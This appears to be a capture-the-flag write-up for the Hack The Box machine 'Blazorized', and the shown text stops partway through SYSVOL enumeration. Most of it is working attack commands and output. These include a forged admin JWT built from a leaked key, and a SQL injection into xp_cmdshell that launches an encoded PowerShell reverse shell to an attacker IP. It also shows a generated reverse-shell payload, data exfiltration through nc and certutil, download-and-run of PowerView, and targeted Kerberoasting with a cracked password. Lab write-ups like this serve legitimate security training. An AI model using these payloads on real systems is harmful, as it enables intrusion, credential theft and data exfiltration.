Blazorized

Recon

nmap_scan.log

└─$ grep bla /etc/hosts
10.10.11.22     blazorized.htb  admin.blazorized.htb    api.blazorized.htb

HTTP (80)

Writeup.png

Since dns exists I first did DNS enumeration:

└─$ domain="blazorized.htb"; ffuf -u "http://$domain" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fl 2
       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://blazorized.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.blazorized.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response lines: 2
________________________________________________

admin                   [Status: 200, Size: 2037, Words: 149, Lines: 28, Duration: 160ms]
:: Progress: [19966/19966] :: Job [1/1] :: 428 req/sec :: Duration: [0:02:05] :: Errors: 0 ::

The Check for Updates page makes request to api subdomain

Writeup-1.png

In the API request we see an Authorization Token, but we are not yet logged in.

Writeup-2.png

Nice, we have superadmin session token

Writeup-3.png

Blazor DLLs

I tried using token to login into the admin panel but was unlucky. If we look at traffic when visiting admin subdomain some odd requests are made. Backend seems to be based on .NET C#... Yeap!Blazor is a free and open-source web framework that enables developers to create web user interfaces based on components, using C# and HTML. It is being developed by Microsoft, as part of the ASP.NET Core web app framework. Wikipedia

Writeup-4.png

App is built with wasm and Blazor. If you visit the website for the first time you'll notice it's saying Loading, but that's fine nothing unusual. But if you're monitoring the traffic you see a lot of interesting things! Reference: Just Blazor Programming: Hack A Blazor WASM App

Writeup-5.png

Copy the dll endpoint links into endpoints_burp.log and download all of them.

└─$ ccd dlls; for dll in $(cat ../endpoints_burp.log | cut -f4); do url="http://blazorized.htb/$dll"; curl -LO "$url"; done;

Leaked JWT Secret

We don't need System.* or Microsoft.* dll so we can skip them. Usually we need projectname.*. The Helpers dll reveals information about JWT signing and we have a key.

8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a

Writeup-6.png

Code which created admin token:

public static string GenerateSuperAdminJWT(long expirationDurationInSeconds = 60L)  
{  
    //IL_0063: Unknown result type (might be due to invalid IL or missing references)  
    //IL_0069: Expected O, but got Unknown  
    //IL_0069: Unknown result type (might be due to invalid IL or missing references)  
    try  
    {  
        List<Claim> list = new List<Claim>  
        {  
            new Claim("http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress", superAdminEmailClaimValue),  
            new Claim("http://schemas.microsoft.com/ws/2008/06/identity/claims/role", superAdminRoleClaimValue)  
        };  
        string text = issuer;  
        string text2 = adminDashboardAudience;  
        SigningCredentials signingCredentials = GetSigningCredentials();  
        DateTime? dateTime = DateTime.UtcNow.AddSeconds(expirationDurationInSeconds);  
        JwtSecurityToken val = new JwtSecurityToken(text, text2, (IEnumerable<Claim>)list, (DateTime?)null, dateTime, signingCredentials);  
        return ((SecurityTokenHandler)new JwtSecurityTokenHandler()).WriteToken((SecurityToken)(object)val);  
    }  
    catch (Exception)  
    {  
        throw;  
    }  
}

Forge the token:

Writeup-7.png

eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJleHAiOjE3Mzk5MjUxMzAsImlzcyI6Imh0dHA6Ly9hcGkuYmxhem9yaXplZC5odGIiLCJhdWQiOiJodHRwOi8vYWRtaW4uYmxhem9yaXplZC5odGIifQ.abD8mXBx16TPSoArZO3uZRX1aNmrqjdknvElGz0CD9iZmE9O9voA1DxE1AIRhrSLUelcyLjZswOh7oGac1SvLA

The admin subdomain first tries to authenticate by JWT Token. There was LocalStorage dll so it must be taking value from that. After a lot of fuzzing jwt was the key it used for auth...

Writeup-8.png

Admin Panel

Writeup-9.png

SQLi

Testing for SQL injection we get True or False, so Blind Injection.

Writeup-11.png

Writeup-10.png

In the nmap scan we saw MSSQL used, it allows Command Execution:

EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';

Verify if we can execute commands:

Writeup-12.png

uwu'; EXEC xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwAyACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' -- - 

Reverse Shell (nu_1055)

PS C:\Windows\system32> whoami /all

User Name          SID
================== =============================================
blazorized\nu_1055 S-1-5-21-2039403211-964143010-2924010611-1117

Group Name                                  Type             SID                                           Attributes
=========================================== ================ ============================================= ==================================================
Everyone                                    Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                           Alias            S-1-5-32-568                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                          Well-known group S-1-5-3                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                               Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                       Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
BLAZORIZED\Normal_Users                     Group            S-1-5-21-2039403211-964143010-2924010611-1133 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Kerberos support for Dynamic Access Control on this device has been disabled.

User.txt

PS C:\users\nu_1055> cat desktop/user.txt
107b582695337abf5d14a086491ef9cc

Privilege Escalation (RSA_4810)

└─$ villain -x 6502

    ┬  ┬ ┬ ┬  ┬  ┌─┐ ┬ ┌┐┌
    └┐┌┘ │ │  │  ├─┤ │ │││
     └┘  ┴ ┴─┘┴─┘┴ ┴ ┴ ┘└┘
                 Unleashed

[Meta] Created by t3l3machus
[Meta] Follow on Twitter, HTB, GitHub: @t3l3machus
[Meta] Thank you!

[Info] Initializing required services:
[0.0.0.0:6501]::Team Server
[0.0.0.0:4443]::Netcat TCP Multi-Handler
[0.0.0.0:6502]::HoaxShell Multi-Handler
[0.0.0.0:8888]::HTTP File Smuggler

[Info] Welcome! Type "help" to list available commands.
Villain > generate payload=windows/netcat/powershell_reverse_tcp lhost=tun0
Generating backdoor payload...
Start-Process $PSHOME\powershell.exe -ArgumentList {$client = New-Object System.Net.Sockets.TCPClient('10.10.16.72',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()} -WindowStyle Hidden
Copied to clipboard!
[Shell] Backdoor session established on 10.10.11.22
Villain > backdoors

Session ID            IP Address   Shell           Listener  Stability  Status
--------------------  -----------  --------------  --------  ---------  ------
964cbe-c46f05-8d6a5a  10.10.11.22  powershell.exe  netcat    Stable     Active

Writeup-13.png

PS C:\users\public> upload /opt/scripts/enum/winPEASx64.exe C:\users\public\wp.exe
Success!
PS C:\users\public> .\wp.exe | tee-object -filepath wp.log

Writeup-14.png

Writeup-15.png

Writeup-16.png

PS C:\users\nu_1055> systeminfo

Host Name:                 DC1
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00429-00521-62775-AA656
Original Install Date:     1/8/2024, 1:09:13 PM
System Boot Time:          7/2/2024, 5:37:39 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.21805430.B64.2305221826, 5/22/2023
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume3
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-06:00) Central Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 826 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 1,064 MB
Virtual Memory: In Use:    3,735 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    blazorized.htb
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.11.22
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
PS C:\windows\panther> cat unattend.xml
...
                <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
                  <UserAccounts>
                    <AdministratorPassword>*SENSITIVE*DATA*DELETED*</AdministratorPassword>
                  </UserAccounts>
...

web.config files also had nothing.

We are part of custom group so It's worth enumerating Groups.

BLAZORIZED\nu_1055> upload ./SharpHound.exe SH.exe
BLAZORIZED\nu_1055> .\SH.exe -c all --zipfilename sh.zip --zippassword 'Password123$'
BLAZORIZED\nu_1055> ls
    Directory: C:\users\public

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        10/6/2021   3:38 PM                Documents
d-r---        9/15/2018   2:19 AM                Downloads
d-----         7/2/2024  11:23 AM                loot
d-r---        9/15/2018   2:19 AM                Music
d-r---        9/15/2018   2:19 AM                Pictures
d-r---        9/15/2018   2:19 AM                Videos
-a----         7/2/2024  11:37 AM          23459 20240702113738_sh.zip
-a----         7/2/2024  11:34 AM        1342464 SH.exe
-a----         7/2/2024   9:37 AM        2387456 wp.exe
-a----         7/2/2024   9:41 AM         598234 wp.log
-a----         7/2/2024  11:37 AM          46015 ZWY3N2UxMzgtNTg0Zi00OTg1LTllNmQtMDg1Yjc5ZmYzNWMz.bin

BLAZORIZED\nu_1055> upload nc64.exe nc.exe
BLAZORIZED\nu_1055> cat 20240702113738_sh.zip | ./nc.exe 10.10.16.72 4444

Exfiltrate the zip

Writeup-17.png

As I thought, the exfiltration was not successful because of piping zip directly to nc. To bypass this we can encode the file using Base64, easiest way being certutil.exe

BLAZORIZED\nu_1055> certutil.exe -encode 20240702115628_sh.zip sh.zip.base64
Input Length = 22554
Output Length = 31068
CertUtil: -encode command completed successfully.
BLAZORIZED\nu_1055> cat sh.zip.base64 | ./nc.exe 10.10.16.72 4444
---
└─$ cat loot.zip.base64 | base64 -di > loot.zip

└─$ file loot.zip
loot.zip: Zip archive data, at least v2.0 to extract, compression method=deflate

└─$ unzip loot.zip
Archive:  loot.zip
  inflating: 20240702115628_computers.json
  inflating: 20240702115628_users.json
  inflating: 20240702115628_groups.json
  inflating: 20240702115628_containers.json
  inflating: 20240702115628_domains.json
  inflating: 20240702115628_gpos.json
  inflating: 20240702115628_ous.json

Note: certutil.exe is used for certificates, make sure to remove First and Last line for valid Base64!

Note: I removed the password for Base64.

Unfortunately the Bloodhound app cannot digest the collected information because of Sharphound 5.x BloodHoundAD: Zip File not loading #700 Community Edition Bloodhound is required for setup: https://github.com/SpecterOps/BloodHound

sudo apt install docker-compose 
curl -L https://ghst.ly/getbhce | docker-compose -f - up # docker-compose (With dash on kali)

BloodHound

Owned user is part of following groups

Writeup-19.png

We have Outbound Object Control: WriteSPN on RSA_4810 account.

The user NU_1055@BLAZORIZED.HTB has the ability to write to the "serviceprincipalname" attribute to the user RSA_4810@BLAZORIZED.HTB.

Writeup-18.png

If we click on WriteSPN we get some juicy details!

Writeup-20.png

TheHackerRecipies > DACL abuse > BloodHound ACE edgesTheHackerRecipies > DACL abuse > BloodHound ACE edges > Targeted Kerberoasting

Writeup-21.png

BLAZORIZED\nu_1055> IEX(IWR 10.10.16.72/PowerView.ps1 -UseBasicParsing)
BLAZORIZED\nu_1055> Get-DomainUser 'RSA_4810' | Select serviceprincipalname

serviceprincipalname
--------------------
blazorized.htb/admin

BLAZORIZED\nu_1055> Set-DomainObject -Identity 'RSA_4810' -Set @{serviceprincipalname='daddy/issues'}
BLAZORIZED\nu_1055> $User = Get-DomainUser 'RSA_4810'
BLAZORIZED\nu_1055> $User | Get-DomainSPNTicket | fl
SamAccountName       : RSA_4810
DistinguishedName    : CN=RSA_4810,CN=Users,DC=blazorized,DC=htb
ServicePrincipalName : daddy/issues
TicketByteHexStream  :
Hash                 : $krb5tgs$23$*RSA_4810$blazorized.htb$daddy/issues*$1461290852DF10FFC82979557447F05D$FD1FBC62FF7E
                       832711A0234D5F4770C5B0A2F2E2C794756830E2C38395AE315B83CC2E1F93780C720CB9A5D6DFEDFFA00EB1153E8408
                       0AD3D8B6CCF256615B7FCB8F690F6167017EB566377523CE831EF570AA625CEB6E219BE521A842F1A0F11B56363BEA4B
                       64C7F811213432BA1D90E5242E49BB51FB565CED56BB9C1BFE2FB3F717E60CB8C6AA178C23310A2278BF6EEB56797960
                       343B99A7E9332A4A9DAB60086091A0EBF9EB9EC9826A77121FCAE45B854CA7C842532AD932CB2AD3679563D32B30E714
                       3A65EBB76CB933A6CBB56657F9E8C7676349611F93DB5EA24F177ADDD1BFC24757674CF44890D172121AB6B46EA71757
                       CEA570A391427741AABE1CD598BBD489E0FB570E0D22F324E1A8B48DFC648C2886707A97C96894E7F799EB588D5B75F9
                       A3CF130E85086B3C514C2BFB33183DDF9D43AFA378E6A280C9AA14FC45F2D0A28250CD3C090BF4924F408B940C675EA0
                       6F8B5F7671D1A7798F8AE53EC57564D71EFCDF9EA03820550EE755E8FF80A83DDD901238A36BFE19DD04452365E91412
                       B2EADAEB5F706B58AE51ACF59A9BDC7FBDEE8EAB170E97468F64D175559F54DB7AB4026854A122E5E813B10160C0FD59
                       E3EA65EE9F3DFFABF71F4212A9C96A2A0EB6987B589D6119A1DC6D31A1C663D3D86B78CD921BCA55B1BEA821C0C8D03F
                       2F9E084D8AA855474C758C6F67B5BE7B469A0086196EEA4B8685B489A9A1933B268471CCC966AAF7480EA62330985589
                       5E20EEBBDF0362A23FDCEA926C45A238DBF92473E5EDE7FD24D391C1124316216101ADFA185DF64A900CBD1812749BFC
                       FB64287D5A76E7AF24500DE5F95FD05416307BD17306912A9E5CD3DE857EFD2557EFBE8E6AEFE0462355A94BD934FB76
                       63629A8F9C11F0F163CDE8854802DB24FBF6BD3C57D1CC5DE0243679B4AB1C4F782C266E5E7C1BAF20388A9D066BDED6
                       F5B5107774A8599BE4936AE5F5892F4F6B745B333D2E10CA180686F3111C59FC0CA226AE715299A7875CEFA5107E8460
                       6961EA247769A93A330A66617B2F7C7298C9E1F4C7C4B018AFB3AD551BCA6964C52BEB4A436B448B1B0A4A23FECDFA0E
                       BA30F40F223ABF12FAF58941D6F859AD7BB01316F75BAD06D313ACAC11FB147B96D50A6643060FFCAD6DEC655503B2FD
                       C012728FBE0D1D04158A29F40D82C6AD7B48534C11052DBFC381478A9855BB16C3F9B2D66E4788A3365DBDBC3C3C8410
                       29CB8C7D47EFD832BB28AF2B85F0651010169A5734D370C70EE6DB52ABB11AD16D8A6F02B276A21D2CF3DC00AD62D65E
                       CC8C1150EE146D214BAB803BBF376239702FA9F6E8D9EB0EB1E38DD5C934AC6B4BD9DC1089631468CBE0B7234051E4AA
                       C5C8AB3714122A73E94D66B5CB720F7ABA84B73404DEDDB88E00FF3F326F06F3168E10B49B968E7C1A235F0C3F0B58BD
                       0C6A9CB4648F21C00B5BB7CA94BC3FBFC67EC6EE16F4A818B8C6C0D53FFF292B00034F1F99DA78B4D8C548DD07E84754
                       B125E9D5015490201DF68400BA56E5CD23FC8A536BB3275B67E15075CB4DEA72C7EA185AB76695C7EC27CBF5E1B7DEB5
                       5C7B3ECBC19D31C74AE3ACD3831C45AB015E2C67DF6FB86FE07DF55C9C305729B676410A4133A152809872FF208E39FD
                       80E531F82ED3E3635DB598E468F5EC10ACBE2CCFEAA51E845C896749980CF19F0A896B8FD6FE27B7E9E372C3CC088258
                       5D7333572D66A30B0118D967CBBE8421947891422C56D13F389FEE5EA4B5CA59B1D30EC3A9C879411BCEEEE79BFD2638
                       0BFA
BLAZORIZED\nu_1055> $User Set-DomainObject -Identity 'RSA_4810' -Clear serviceprincipalname

➜ .\hashcat.exe --show hashes
...
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
...
➜ .\hashcat.exe -a 0 -m 13100 .\hashes .\rockyou.txt
...
$krb5tgs$23$*RSA_4810$blazorized.htb$daddy/issues*$1461290852df10ffc82979557447f05d$fd1fbc62ff7e832711a0234d5f4770c5b0a2f2e2c794756830e2c38395ae315b83cc2e1f93780c720cb9a5d6dfedffa00eb1153e84080ad3d8b6ccf256615b7fcb8f690f6167017eb566377523ce831ef570aa625ceb6e219be521a842f1a0f11b56363bea4b64c7f811213432ba1d90e5242e49bb51fb565ced56bb9c1bfe2fb3f717e60cb8c6aa178c23310a2278bf6eeb56797960343b99a7e9332a4a9dab60086091a0ebf9eb9ec9826a77121fcae45b854ca7c842532ad932cb2ad3679563d32b30e7143a65ebb76cb933a6cbb56657f9e8c7676349611f93db5ea24f177addd1bfc24757674cf44890d172121ab6b46ea71757cea570a391427741aabe1cd598bbd489e0fb570e0d22f324e1a8b48dfc648c2886707a97c96894e7f799eb588d5b75f9a3cf130e85086b3c514c2bfb33183ddf9d43afa378e6a280c9aa14fc45f2d0a28250cd3c090bf4924f408b940c675ea06f8b5f7671d1a7798f8ae53ec57564d71efcdf9ea03820550ee755e8ff80a83ddd901238a36bfe19dd04452365e91412b2eadaeb5f706b58ae51acf59a9bdc7fbdee8eab170e97468f64d175559f54db7ab4026854a122e5e813b10160c0fd59e3ea65ee9f3dffabf71f4212a9c96a2a0eb6987b589d6119a1dc6d31a1c663d3d86b78cd921bca55b1bea821c0c8d03f2f9e084d8aa855474c758c6f67b5be7b469a0086196eea4b8685b489a9a1933b268471ccc966aaf7480ea623309855895e20eebbdf0362a23fdcea926c45a238dbf92473e5ede7fd24d391c1124316216101adfa185df64a900cbd1812749bfcfb64287d5a76e7af24500de5f95fd05416307bd17306912a9e5cd3de857efd2557efbe8e6aefe0462355a94bd934fb7663629a8f9c11f0f163cde8854802db24fbf6bd3c57d1cc5de0243679b4ab1c4f782c266e5e7c1baf20388a9d066bded6f5b5107774a8599be4936ae5f5892f4f6b745b333d2e10ca180686f3111c59fc0ca226ae715299a7875cefa5107e84606961ea247769a93a330a66617b2f7c7298c9e1f4c7c4b018afb3ad551bca6964c52beb4a436b448b1b0a4a23fecdfa0eba30f40f223abf12faf58941d6f859ad7bb01316f75bad06d313acac11fb147b96d50a6643060ffcad6dec655503b2fdc012728fbe0d1d04158a29f40d82c6ad7b48534c11052dbfc381478a9855bb16c3f9b2d66e4788a3365dbdbc3c3c841029cb8c7d47efd832bb28af2b85f0651010169a5734d370c70ee6db52abb11ad16d8a6f02b276a21d2cf3dc00ad62d65ecc8c1150ee146d214bab803bbf376239702fa9f6e8d9eb0eb1e38dd5c934ac6b4bd9dc1089631468cbe0b7234051e4aac5c8ab3714122a73e94d66b5cb720f7aba84b73404deddb88e00ff3f326f06f3168e10b49b968e7c1a235f0c3f0b58bd0c6a9cb4648f21c00b5bb7ca94bc3fbfc67ec6ee16f4a818b8c6c0d53fff292b00034f1f99da78b4d8c548dd07e84754b125e9d5015490201df68400ba56e5cd23fc8a536bb3275b67e15075cb4dea72c7ea185ab76695c7ec27cbf5e1b7deb55c7b3ecbc19d31c74ae3acd3831c45ab015e2c67df6fb86fe07df55c9c305729b676410a4133a152809872ff208e39fd80e531f82ed3e3635db598e468f5ec10acbe2ccfeaa51e845c896749980cf19f0a896b8fd6fe27b7e9e372c3cc0882585d7333572d66a30b0118d967cbbe8421947891422c56d13f389fee5ea4b5ca59b1d30ec3a9c879411bceeee79bfd26380bfa:(Ni7856Do9854Ki05Ng0005 #)
...

Creds: RSA_4810:(Ni7856Do9854Ki05Ng0005 #)

Privilege Escalation (SSA_6010)

└─$ evil-winrm -i 10.10.11.22 -u 'RSA_4810' -p '(Ni7856Do9854Ki05Ng0005 #)'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> whoami /all

User Name           SID
=================== =============================================
blazorized\rsa_4810 S-1-5-21-2039403211-964143010-2924010611-1107

Group Name                                  Type             SID                                           Attributes
=========================================== ================ ============================================= ==================================================
Everyone                                    Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
BLAZORIZED\Remote_Support_Administrators    Group            S-1-5-21-2039403211-964143010-2924010611-1115 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\users\public> .\SH.exe -c all --zipfilename sh.zip --zippassword 'Password123$'
*Evil-WinRM* PS C:\users\public> download 20240702141848_sh.zip

Writeup-22.png

Writeup-23.png

The Bloodhound doesn't give any more information about PrivEsc. Upload PowerView and explore system manually.

*Evil-WinRM* PS C:\users\public> IEX(IWR 10.10.16.72/PowerView.ps1 -UseBasicParsing)
*Evil-WinRM* PS C:\users\public> Get-DomainUser | Select displayname, logoncount

displayname logoncount
----------- ----------
                   565
                     0
                     0
RSA_4810            24
NU_1056              0
                     0
NU_1058              0
NU_1055            199
RSA_4811             2
RSA_4812             0
RSA_4813             0
RSA_4814             0
SSA_6010          3984
SSA_6011             0
SSA_6012             0
SSA_6013             0
LSA_3211             0
LSA_3212             0
LSA_3213             0

After invoking Get-DomainUser and looking over the result one field stands out, logoncount. 3984 logon time seems line an automated task.

*Evil-WinRM* PS C:\users\public> Get-DomainUser -Identity SSA_6010

logoncount            : 3988
badpasswordtime       : 6/19/2024 9:58:18 AM
distinguishedname     : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
objectclass           : {top, person, organizationalPerson, user}
displayname           : SSA_6010
lastlogontimestamp    : 6/27/2024 7:18:21 AM
userprincipalname     : SSA_6010@blazorized.htb
name                  : SSA_6010
objectsid             : S-1-5-21-2039403211-964143010-2924010611-1124
samaccountname        : SSA_6010
codepage              : 0
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
countrycode           : 0
whenchanged           : 7/2/2024 6:40:52 PM
instancetype          : 4
usncreated            : 29007
objectguid            : 8bf3166b-e716-4f91-946c-174e1fb433ed
lastlogoff            : 12/31/1600 6:00:00 PM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=blazorized,DC=htb
dscorepropagationdata : {6/19/2024 1:24:50 PM, 6/14/2024 12:40:41 PM, 6/14/2024 12:40:28 PM, 6/14/2024 12:38:20 PM...}
memberof              : {CN=Super_Support_Administrators,CN=Users,DC=blazorized,DC=htb, CN=Remote Management Users,CN=Builtin,DC=blazorized,DC=htb}
lastlogon             : 7/2/2024 3:06:09 PM
cn                    : SSA_6010
badpwdcount           : 0
scriptpath            : \\dc1\NETLOGON\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated           : 1/10/2024 2:32:00 PM
primarygroupid        : 513
pwdlastset            : 2/25/2024 11:56:55 AM
usnchanged            : 345421
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> Get-SmbShare

Name     ScopeName Path Description
----     --------- ---- -----------
ADMIN$   *              Remote Admin
C$       *              Default share
IPC$     *              Remote IPC
NETLOGON *              Logon server share
SYSVOL   *              Logon server share

*Evil-WinRM* PS C:\windows\sysvol> ls -Recurse -Filter '02FCE0D1303F.bat' -ErrorAction SilentlyContinue

